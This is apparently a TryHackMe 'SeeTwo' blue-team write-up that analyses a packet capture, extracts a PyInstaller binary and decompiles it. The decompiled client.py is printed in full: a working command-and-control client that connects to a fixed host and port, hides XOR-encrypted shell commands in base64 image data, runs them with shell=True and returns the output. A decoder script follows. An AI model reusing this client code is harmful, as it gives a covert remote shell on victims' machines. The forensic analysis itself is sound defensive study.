SeeTwo (THM)

Can you see who is in command and control?

Intro.

Hello Fellows today we have a kinda blue team machine looks interesting let's get right into it.

---

Start

First we need to install the zip file to extract the pacp file and open it with wireshark to see what we have.

searching.

So the first thing interest me was a communication at stream 3 which has base 64 data. will take it one by one.

after decode the data using cyberchef we will see an image.

CyberChef

i have decoded all of them but i only found these two images am not sure what they mean but let's let this aside and look in another place.

So after a bit more search i found that there is an end point called /client_base64 which has been requested.

So we can export this to attempt to decoded. using wireshark we can do. file -> export object -> HTTP. and from there we just save the file.

after we save the file we decoded it and we find that it actually a binary file. let's use ghidra to reverse engineer it.

ghidra did not give me much so i decide to use another way using the strings command in linux we can see that this file looks like a python compiled which is a .pyc file.

Decompile compiled python binaries (exe, elf) - Retreive from .pycHackTricks

reading a bit in hackTricks we can find a tool called pyinstxtractor which help us to extract the .pyc files from a compiled file. Note that we assume the file has been compiled using PyInstaller.

GitHub - extremecoders-re/pyinstxtractor: PyInstaller ExtractorGitHub

after that we can use a tool called. uncompyle6 to convert from pyc to py files.

this how we can install the tool.

now let's use it.

 uncompyle6 client.pyc 
# uncompyle6 version 3.9.2
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.12.6 (main, Sep  7 2024, 14:20:15) [GCC 14.2.0]
# Embedded file name: client.py
import socket, base64, subprocess, sys
HOST = "10.0.2.64"
PORT = 1337

def xor_crypt(data, key):
    key_length = len(key)
    encrypted_data = []
    for i, byte in enumerate(data):
        encrypted_byte = byte ^ key[i % key_length]
        encrypted_data.append(encrypted_byte)
    else:
        return bytes(encrypted_data)


with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    while True:
        received_data = s.recv(4096).decode("utf-8")
        encoded_image, encoded_command = received_data.split("AAAAAAAAAA")
        key = "MySup3rXoRKeYForCommandandControl".encode("utf-8")
        decrypted_command = xor_crypt(base64.b64decode(encoded_command.encode("utf-8")), key)
        decrypted_command = decrypted_command.decode("utf-8")
        result = subprocess.check_output(decrypted_command, shell=True).decode("utf-8")
        encrypted_result = xor_crypt(result.encode("utf-8"), key)
        encrypted_result_base64 = base64.b64encode(encrypted_result).decode("utf-8")
        separator = "AAAAAAAAAA"
        send = encoded_image + separator + encrypted_result_base64
        s.sendall(send.encode("utf-8"))

# okay decompiling client.pyc

so decompile the client.pyc file we get this results.

we can see in the code that he attept to append some data to the images that we found and when it recive it it will do some XOR operations as an encryption and then append it again and send the image with the resulted command executed on the target system and this gose forever. using some python we can decode evey message and extract the command the the results.

received_data = None
while received_data != "q":
    received_data = input("Enter the data you want to decrypt : ")

    key ="MySup3rXoRKeYForCommandandControl".encode("utf-8")

    encoded_image, encoded_command = received_data.split("AAAAAAAAAA")

    unbased = base64.b64decode(encoded_command.encode("utf-8"))
    key_len = len(key)
    decrypted_data = []
    for i, byte in enumerate(unbased):
        decrypted_byte = byte ^ key[i % key_len]
        decrypted_data.append(decrypted_byte)

    print(decrypted_data)
    result = ''.join(chr(i) for i in decrypted_data)
    print(result)

#  to reverse the encryption function we just need to preform the XOR operation again on the same data using the same key.

as we can see in the code we can reverse the XOR operation by doing it again on the same encrypted data.

What is the first file that is read? Enter the full path of the file.

we can find the answer of the first question here.

What is the output of the file from question 1?

the attacker was able to find some creds in the file from the first question.

What is the user that the attacker created as a backdoor? Enter the entire line that indicates the user.

continue decrypt the messages we can find the answer of the third question.

What is the name of the backdoor executable?

What is the md5 hash value of the executable from question 4?

What was the first cronjob that was placed by the attacker?

What is the flag?

final thoughts.

the machine actullay was so much fun it teach u about python compiled and how to extract the pyc files convert them into py file and how to decrypt some data. as for the question once you have the decryptor code you just copy and paste of the answer overall it was soooooooooooooooooooo fun. 😂